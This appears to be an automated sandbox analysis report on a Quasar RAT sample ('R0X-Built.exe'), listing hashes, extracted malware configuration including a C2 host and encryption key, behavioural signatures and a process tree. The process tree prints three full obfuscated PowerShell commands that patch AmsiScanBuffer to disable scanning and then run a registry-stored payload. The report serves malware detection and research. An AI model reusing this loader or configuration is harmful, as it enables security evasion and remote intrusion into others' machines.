Analysis
-
max time kernel
1050s -
max time network
451s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
04-05-2024 05:11
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
baed4bf822391e30e4dbe2ae0ea3fcfe
-
SHA1
d978134771b65bace600644691b4d30c893920e8
-
SHA256
5ded8a15f37933b10dc5f2daea6c7ebbee3017da22d53f875acfa5882a318b6d
-
SHA512
b428424cfe003421a7c0a5d21a06709e80ee35d8c0f0501be19d8250fad27c72fcd98b9290510de0dc1147915751383a2908f075592eb4f2b8258e090cf2c452
-
SSDEEP
6144:OMS2pJAJcC0B6ezDDORUjySfNr3FHg60x4gQRbcdVsmAklsGEUGka9mC:jpyJcC+VzDDORm1rUQyiklFEUGka9mC
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
centre-clan.gl.at.ply.gg:40354
Mutex
$Sxr-HfroCBO1JCip2IbHKX
Attributes
-
encryption_key
2mXe0Epj621bYEM4YYhW
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-mstha
-
subdirectory
Windows
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 24 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 29 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 35 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Modifies Internet Explorer settings 1 TTPs 7 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 38 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{53964380-b0d0-4206-b0db-5f9ad0d84224}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0db211e9-c450-43e6-842d-babf05c40be6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e989d9b1-9d18-4933-8690-2f3136d4bc0d}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eCtokGeEDlGS{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uWZuswZKVvWheI,[Parameter(Position=1)][Type]$fSgZbvlCkK)$vtNWfxCCGbN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+'m'+'o'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+','+''+'S'+''+'e'+'al'+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+''+'i'+''+'C'+''+'l'+'a'+'s'+''+[Char](115)+''+','+''+'A'+''+'u'+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$vtNWfxCCGbN.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+''+[Char](78)+'am'+'e'+''+','+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uWZuswZKVvWheI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$vtNWfxCCGbN.DefineMethod('In'+'v'+'ok'+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+'ide'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$fSgZbvlCkK,$uWZuswZKVvWheI).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $vtNWfxCCGbN.CreateType();}$NeUpOnNIfords=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+'t.'+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+'eM'+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$aUFEkGywmuBnib=$NeUpOnNIfords.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+'r'+'o'+'cA'+[Char](100)+'dr'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'ic'+[Char](44)+''+[Char](83)+'t'+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EsPhycILSOdKcOvLWGp=eCtokGeEDlGS @([String])([IntPtr]);$IoWyOwrXoeKCvVcVakqBoz=eCtokGeEDlGS @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BNPswERNzgJ=$NeUpOnNIfords.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+'o'+'d'+[Char](117)+'l'+[Char](101)+''+'H'+'andl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$BQQavcXXhwerGU=$aUFEkGywmuBnib.Invoke($Null,@([Object]$BNPswERNzgJ,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+'L'+'ib'+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$uNqanssuaiYgJDVGs=$aUFEkGywmuBnib.Invoke($Null,@([Object]$BNPswERNzgJ,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$OGdFEnf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BQQavcXXhwerGU,$EsPhycILSOdKcOvLWGp).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$qoFEDCYDZsxHpdPSf=$aUFEkGywmuBnib.Invoke($Null,@([Object]$OGdFEnf,[Object](''+[Char](65)+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$clAJTBREEA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uNqanssuaiYgJDVGs,$IoWyOwrXoeKCvVcVakqBoz).Invoke($qoFEDCYDZsxHpdPSf,[uint32]8,4,[ref]$clAJTBREEA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qoFEDCYDZsxHpdPSf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uNqanssuaiYgJDVGs,$IoWyOwrXoeKCvVcVakqBoz).Invoke($qoFEDCYDZsxHpdPSf,[uint32]8,0x20,[ref]$clAJTBREEA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HKhNhfiNhjXF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vnDlhoGnnyIBcf,[Parameter(Position=1)][Type]$kTXsRMsKaI)$KzTaZrMxWuf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'eTyp'+'e'+'','C'+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',Pu'+'b'+'l'+[Char](105)+'c'+','+''+[Char](83)+''+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$KzTaZrMxWuf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+'de'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$vnDlhoGnnyIBcf).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+[Char](101)+'d');$KzTaZrMxWuf.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+[Char](98)+'li'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+'Virt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$kTXsRMsKaI,$vnDlhoGnnyIBcf).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KzTaZrMxWuf.CreateType();}$CPnPKzbziAHJw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+''+'s'+'of'+[Char](116)+''+'.'+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+'s'+'a'+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$mQkFFvtKzCTbdm=$CPnPKzbziAHJw.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$tiGuKyjxcoGyTlFSZTM=HKhNhfiNhjXF @([String])([IntPtr]);$aDYnUvWITaTTVBKAqoqutB=HKhNhfiNhjXF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LeMSWOilDqY=$CPnPKzbziAHJw.GetMethod(''+'G'+''+'e'+'t'+'M'+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+'l'+[Char](51)+'2'+[Char](46)+'dl'+'l'+'')));$zIggrMSnVxbXhJ=$mQkFFvtKzCTbdm.Invoke($Null,@([Object]$LeMSWOilDqY,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+'r'+''+[Char](121)+''+'A'+'')));$pVsyvqfCkocCTeCwK=$mQkFFvtKzCTbdm.Invoke($Null,@([Object]$LeMSWOilDqY,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$lgBTFYC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zIggrMSnVxbXhJ,$tiGuKyjxcoGyTlFSZTM).Invoke(''+[Char](97)+'msi'+'.'+''+[Char](100)+'ll');$fKshRhAzzLfBLXPuD=$mQkFFvtKzCTbdm.Invoke($Null,@([Object]$lgBTFYC,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$PNYGGciCXq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pVsyvqfCkocCTeCwK,$aDYnUvWITaTTVBKAqoqutB).Invoke($fKshRhAzzLfBLXPuD,[uint32]8,4,[ref]$PNYGGciCXq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fKshRhAzzLfBLXPuD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pVsyvqfCkocCTeCwK,$aDYnUvWITaTTVBKAqoqutB).Invoke($fKshRhAzzLfBLXPuD,[uint32]8,0x20,[ref]$PNYGGciCXq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+'TW'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+'77'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KnchBuIWAysQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VNosmomwMFGgdf,[Parameter(Position=1)][Type]$LHuAYFTUHW)$gzBLvZWbKKT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+'ec'+[Char](116)+'edD'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+'m'+''+[Char](111)+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+'e'+'d'+',A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Au'+[Char](116)+'o'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$gzBLvZWbKKT.DefineConstructor(''+'R'+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+'lNa'+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+'e'+'BySig'+','+''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VNosmomwMFGgdf).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$gzBLvZWbKKT.DefineMethod('I'+[Char](110)+''+'v'+'oke',''+'P'+'ub'+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$LHuAYFTUHW,$VNosmomwMFGgdf).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $gzBLvZWbKKT.CreateType();}$XIRxVdtXzRtIC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+'e'+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+'cro'+[Char](115)+''+[Char](111)+'f'+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+'s'+''+[Char](97)+'f'+'e'+'Na'+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$vtErmhxeZpJaWC=$XIRxVdtXzRtIC.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'ddr'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+'ati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UKTeddKJWgfFJyIOENm=KnchBuIWAysQ @([String])([IntPtr]);$iLyhLpyKIpmcYlqekYMHzb=KnchBuIWAysQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WOmFJBMxsgo=$XIRxVdtXzRtIC.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+'ne'+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+'l'+''+[Char](108)+'')));$qNeCKhSJYwAMhk=$vtErmhxeZpJaWC.Invoke($Null,@([Object]$WOmFJBMxsgo,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'yA')));$EnaZNCTfdDzESnqWA=$vtErmhxeZpJaWC.Invoke($Null,@([Object]$WOmFJBMxsgo,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$MpdZTKG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qNeCKhSJYwAMhk,$UKTeddKJWgfFJyIOENm).Invoke(''+[Char](97)+'msi'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$TFGCLtdrAShsGdziw=$vtErmhxeZpJaWC.Invoke($Null,@([Object]$MpdZTKG,[Object](''+'A'+''+'m'+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+'ff'+[Char](101)+''+'r'+'')));$mEbHeGoHSe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EnaZNCTfdDzESnqWA,$iLyhLpyKIpmcYlqekYMHzb).Invoke($TFGCLtdrAShsGdziw,[uint32]8,4,[ref]$mEbHeGoHSe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TFGCLtdrAShsGdziw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EnaZNCTfdDzESnqWA,$iLyhLpyKIpmcYlqekYMHzb).Invoke($TFGCLtdrAShsGdziw,[uint32]8,0x20,[ref]$mEbHeGoHSe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
